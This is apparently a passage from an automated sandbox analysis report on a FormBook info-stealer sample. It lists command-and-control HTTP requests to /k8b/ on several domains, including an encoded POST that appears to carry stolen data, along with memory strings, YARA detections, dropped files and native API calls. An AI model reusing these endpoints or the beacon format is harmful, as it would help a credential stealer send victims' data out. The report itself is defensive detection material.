          Source: global trafficHTTP traffic detected: GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.hblajiche.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=SMkQ1dJlHASFxCpf/3Q/18F7mw+X92y3N7IjaU2400Q98kZWvVlmzFAE//BOXQVAl/hL HTTP/1.1Host: www.synertry.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=G2e63y+YEqJJE4Cw6H5CpBVpRFZjJJTpk/5kYvmebWk4ZKuMNVRhpz6yqptgD5pJx6df&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.thegamergang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.trusted-inspections.com
          Source: unknownHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.trusted-inspections.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.trusted-inspections.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trusted-inspections.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 59 32 7a 6d 4d 33 42 57 4b 46 6e 75 6c 62 47 4d 6a 35 70 44 58 41 31 41 68 39 6d 41 4c 37 42 37 28 4e 33 68 4e 36 46 4f 57 41 51 48 70 75 47 31 64 63 42 4f 35 70 31 72 64 5f 54 4d 42 69 54 2d 71 74 69 35 57 63 6c 44 34 72 71 44 45 64 78 57 68 39 53 67 64 65 66 4c 45 66 7e 4b 66 44 49 6e 76 31 68 67 76 6d 70 71 37 4d 61 5a 69 6f 51 7a 4f 69 69 49 41 5a 44 76 57 79 74 34 71 36 4f 78 66 47 6f 4b 65 41 54 6c 70 30 4b 74 69 32 67 71 35 75 6a 6c 31 78 72 74 47 52 74 6d 44 69 69 41 38 6c 33 69 75 79 63 36 57 42 54 39 6b 31 51 71 42 56 74 32 69 52 5a 53 34 31 4a 71 46 64 76 51 52 5a 43 32 64 63 61 33 64 36 63 4f 56 36 68 6d 39 4a 34 66 37 69 4e 72 45 70 33 4f 67 54 48 53 53 59 71 4d 41 4e 28 70 42 46 5a 52 36 42 5a 47 75 4e 70 68 55 35 6f 55 4b 38 4a 2d 59 61 39 7a 79 71 66 51 47 44 53 74 4c 56 49 50 42 43 7e 49 36 2d 55 4b 6e 4b 59 62 52 6f 36 32 4c 34 4e 70 76 5f 33 2d 53 5a 38 6b 51 77 54 55 75 30 4e 38 58 63 7a 2d 48 75 6c 66 55 59 71 65 6a 44 52 72 74 33 63 72 7e 43 28 49 31 4a 59 4f 74 54 76 67 7e 79 72 41 5a 57 6e 4a 4c 55 30 62 75 56 4e 37 42 6a 71 34 63 38 77 35 4b 47 54 41 48 52 6c 77 49 66 78 50 6e 42 45 66 4e 68 63 57 75 4c 66 41 49 43 36 39 35 4b 49 51 33 76 30 6f 45 41 6c 52 38 38 68 30 4f 36 6f 74 51 54 63 61 28 4e 6c 48 6a 6b 58 49 38 44 6e 57 77 5f 36 30 38 7a 4a 4e 33 33 46 34 42 68 78 4f 6a 67 36 50 31 67 46 70 55 31 6f 54 71 54 55 52 37 79 34 6c 71 43 4e 4e 65 43 78 64 77 6a 52 4d 76 6a 4b 56 52 5a 66 75 34 6a 51 70 6e 4b 52 34 4a 62 30 4d 57 76 69 34 67 6d 64 63 42 42 57 39 53 49 5a 75 36 45 4f 54 
66 70 53 57 79 71 44 35 51 4a 71 6e 62 72 44 77 49 63 4f 4c 74 65 7a 32 70 4e 4a 61 4b 51 31 76 4e 58 67 35 39 52 54 59 50 42 63 7a 35 75 63 53 33 4f 6f 2d 39 52 78 7a 6e 51 51 64 71 65 32 6f 61 74 42 74 7e 4b 6e 43 69 6a 52 6c 7e 68 4c 73 63 64 79 50 56 2d 69 44 4a 54 78 69 69 44 70 33 4d 71 6d 51 41 74 78 4f 69 45 70 32 6d 58 4c 48 36 73 4c 57 4e 6e 51 38 36 2d 6a 5a 31 33 4b 79 6f 4b 54 6c 31 41 4b 38 66 38 59 59 33 48 59 77 4a 74 47 32 62 49 39 35 6a 4c 4f 77 36 75 34 43 41 68 6b 5f 52 34 64 6e 41 33 36 49 34 51 38 6e 79 72 4a 52 61 50 7e 63 4b 6b 7a 61 66 4c 35 6c 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2d=Y2zmM3BWKFnulbGMj5pDXA1Ah9mAL7B7(N3hN6FOWAQHpuG1dcBO5p1rd_TMBiT-qti5WclD4rqDEdxWh9SgdefLEf~KfDInv1hgvmpq7MaZioQzOiiIAZDvWyt4q6OxfGoKeATlp0Kti2gq5ujl1xrtGRtmDiiA8l3iuyc6WBT9k1QqBVt2iRZS41JqFdvQRZC2dca3d6cOV6hm9J4f7iNrEp3OgTHSSYqMAN(pBFZR6BZGuNphU5oUK8J-Ya9zyqfQGDStLVIPBC~I6-UKnKYbRo62L4Npv_3-SZ8kQwTUu0N8Xcz-HulfUYqejDRrt3cr~C(I1JYOtTvg~yrAZWnJLU0buVN7Bjq4c8w5KGTAHRlwIfxPnBEfNhcWuLfAIC695KIQ3v0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 16 Oct 2020 18:04:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000004.00000002.486709012.0000000004E61000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: cmmon32.exe, 0000000A.00000002.476667464.0000000000D1E000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoK
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpN
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpN
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: cmmon32.exe, 0000000A.00000002.480662361.0000000005089000.00000004.00000001.sdmpString found in binary or memory: http://www.thegamergang.com
          Source: cmmon32.exe, 0000000A.00000002.480662361.0000000005089000.00000004.00000001.sdmpString found in binary or memory: http://www.thegamergang.com/k8b/
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/5
          Source: cmmon32.exe, 0000000A.00000002.476667464.0000000000D1E000.00000004.00000020.sdmp, cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
          Source: cmmon32.exe, 0000000A.00000002.476667464.0000000000D1E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0e/

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logri.ini
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0A7C01A2 NtQuerySystemInformation,0_2_0A7C01A2
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0A7C0167 NtQuerySystemInformation,0_2_0A7C0167
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419D40 NtCreateFile,3_2_00419D40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419DF0 NtReadFile,3_2_00419DF0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419E70 NtClose,3_2_00419E70
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419F20 NtAllocateVirtualMemory,3_2_00419F20
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419D3A NtCreateFile,3_2_00419D3A
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419DEA NtCreateFile,NtReadFile,3_2_00419DEA
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419E6B NtClose,3_2_00419E6B
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419F1A NtAllocateVirtualMemory,3_2_00419F1A
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC99A0 NtCreateSection,LdrInitializeThunk,3_2_01AC99A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01AC9910
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_01AC98F0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01AC9860
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9840 NtDelayExecution,LdrInitializeThunk,3_2_01AC9840
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A20 NtResumeThread,LdrInitializeThunk,3_2_01AC9A20
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01AC9A00
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A50 NtCreateFile,LdrInitializeThunk,3_2_01AC9A50
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC95D0 NtClose,LdrInitializeThunk,3_2_01AC95D0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9540 NtReadFile,LdrInitializeThunk,3_2_01AC9540
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01AC97A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9780 NtMapViewOfSection,LdrInitializeThunk,3_2_01AC9780
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9710 NtQueryInformationToken,LdrInitializeThunk,3_2_01AC9710
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01AC96E0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01AC9660
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC99D0 NtCreateProcessEx,3_2_01AC99D0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9950 NtQueueApcThread,3_2_01AC9950
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC98A0 NtWriteVirtualMemory,3_2_01AC98A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9820 NtEnumerateKey,3_2_01AC9820
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACB040 NtSuspendThread,3_2_01ACB040
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACA3B0 NtGetContextThread,3_2_01ACA3B0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9B00 NtSetValueKey,3_2_01AC9B00
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A80 NtOpenDirectoryObject,3_2_01AC9A80
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A10 NtQuerySection,3_2_01AC9A10
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC95F0 NtQueryInformationFile,3_2_01AC95F0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9520 NtWaitForSingleObject,3_2_01AC9520
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACAD30 NtSetContextThread,3_2_01ACAD30
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9560 NtWriteFile,3_2_01AC9560
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9FE0 NtCreateMutant,3_2_01AC9FE0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9730 NtQueryVirtualMemory,3_2_01AC9730
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACA710 NtOpenProcessToken,3_2_01ACA710
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9760 NtOpenProcess,3_2_01AC9760
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACA770 NtOpenThread,3_2_01ACA770
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AC9770 NtSetInformationFile
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AC96D0 NtCreateKey
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AC9610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AC9670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AC9650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A499A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A495D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49560 NtWriteFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A496E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A496D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49610 NtEnumerateValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49770 NtSetInformationFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A498A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A498F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A4B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A495F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A499D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A4AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49A20 NtResumeThread
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49A10 NtQuerySection
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A497A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A4A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A4A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A49760 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A4A770 NtOpenThread
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759D40 NtCreateFile
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759DF0 NtReadFile
